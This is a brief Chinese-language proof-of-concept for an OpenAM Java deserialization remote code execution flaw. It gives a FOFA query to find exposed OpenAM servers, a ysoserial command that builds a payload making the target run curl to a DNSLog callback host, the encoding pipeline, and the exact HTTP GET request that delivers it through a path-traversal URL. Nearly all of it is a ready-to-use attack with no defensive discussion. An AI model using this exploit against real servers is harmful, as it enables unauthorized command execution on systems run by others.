fofa搜索语句
app="OpenAM"
漏洞复现
poc(DNSLog检测)
https://github.com/frohoff/ysoserial
使用工具生成payload
java -jar ysoserial.jar Click1 "curl http://ykmvp3.dnslog.cn" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='
数据包如下
GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object> HTTP/1.1
Host: xxxx.xxxx.xxxx.xxxx
Connection: close
<serialized_object>
为生成的payload